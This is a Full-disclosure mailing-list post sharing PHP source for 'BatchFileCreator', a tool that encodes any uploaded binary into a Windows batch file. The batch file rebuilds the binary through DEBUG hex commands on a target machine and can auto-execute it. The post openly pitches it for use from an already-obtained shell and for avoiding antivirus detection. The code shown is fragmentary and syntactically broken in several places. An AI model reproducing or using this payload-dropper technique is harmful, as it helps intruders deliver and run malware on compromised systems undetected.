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[Full-disclosure] Batch File Creator (A batch file that can create a program (exe, bat, mp3, etc..) and execute it without downloading anything)

*PHP BatchFileCreator (batch program that makes and execute a program)

If you have a shell, and you want to send a file, you need to use FTP to
process it, or to try to compile it there.. anyway, this code, will generate
a batch file that will create the specified file and optionally execute it.

It is usefull to any person that wants to:

1.- Encrypt a file content, or avoid Antivirus detection.
2.- Make a batch file that serves as an installation program.
3.- Create a binary program at an ASCII (plain text) windows shell.

*Steps for making your batch programs:
1.- Send the file to http://sirdarckcat.awardspace.com/BFC.php
2.- Download the batch file that it will create.
3.- Execute it in your target.

The source code of the PHP program is this:

* Batch File Creator
*  By SirDarckCat from elhacker.net
*  Program distributed under the GNU - GPL License
if(isset($_FILES['attachment']['name']) &&
if ($_FILES['attachment']['size']==0){
        echo "PHP.INI settings, doesn?t allow me to process your file, or you
did something wrong\r\n";
header("Content-Type: text/plain");
header("Content-Disposition: attachment;filename=\"BFC".rand(0,5012).".bat\"");
        $z=(isset($_REQUEST['autostart']))?"start $rn":"EXIT";
        echo "@echo off\r\n
        REM BatchFileCreator 0.1
        REM     By SirDarckCat from elhacker.net
        REM Visit http://sirdarckcat.googlepages.com/bfc
\r\nif EXIST shell.x (
        echo Loading..
        start \"Loading..\" /MIN /WAIT cmd /C debug^<shell.x
        if EXIST \"$rn\" (
                del \"$rn\"
        ren $tn,\"$rn\"
        start cmd /C del shell.x
) ELSE (
        start cmd /C del shell.x
        \r\necho n $tn >shell.x\r\ntype %~nx0|find \"e \"|find /v
\"REM\">>shell.x\r\necho rcx>>shell.x\r\necho
w".((isset($_REQUEST['binary']))?"0":" ")." >>shell.x\r\necho
        for ($i=$bin;$i<strlen($x)+$bin;$i++){
                if (!($i%16)){
                        echo "\r\ne ".base_convert($i,10,16)." ";
                echo substr("00".base_convert(ord($x[$i-$bin]),10,16),-2)." ";
        echo "\r\n REM EOF\r\n";
}else if (isset($_FILES['attachment']['name']) &&
        header("Content-Type: text/plain");
        @ob_start('ob_gzhandler'); // This are larger files, so we better
compress them :P
        $z=(isset($_REQUEST['autostart']))?"start \"\" \"$rn\"":"EXIT";
        echo "@echo off

                REM BatchFileCreator 0.1
                REM     By SirDarckCat from elhacker.net
                REM Visit http://sirdarckcat.googlepages.com/bfc
        IF \"%~1\"==\"\" (
                echo Loading..
                start \"Loading..\" /MIN /WAIT cmd /C \"%~nx0 xD\"^|debug
                copy /Y /B $tn.*,\"$rn\"
                del $tn.*
        ) ELSE (\r\n";
                for ($j=0;$j<$xx;$j++){
                        echo "echo n $tn.p$j";
                        for ($i=0;$i<$sl;$i++){
                                if (!($i%16)){
                                        echo "\r\necho e ".base_convert($i,10,16)." 
substr("00".base_convert(ord($x[$i]),10,16),-2)." ";
                        echo "\r\necho rcx\r\n";
                        echo "echo ".base_convert(strlen($x),10,16)."\r\n";
                        echo "echo w 0\r\n";
                echo "echo q\r\n";
        echo ")";
<title>BatchFileCreator 0.1 by sirdarckcat</title>
        <h1>BatchFileCreator 0.1</h1>
        <h3>by sirdarckcat</h3>
                With this program you can create a batch file that when is 
will generate
                and (optionally) execute a binary file.
                Select the file you want to upload, then submit. With a very 
large file your
                computer may be unable to process it. (MaxSize: 2 MegaBytes)
        </pre><table align=center>
        <form method=POST ENCTYPE="multipart/form-data" action="?download">
        <input type=checkbox name=autostart value=1> - Autostart when is 
        <input type=checkbox name=binary value=1> - Binary?<br>
        File: <input type=file name=attachment> <br></table>
        <input type=submit></center>

Hope its usefull :)


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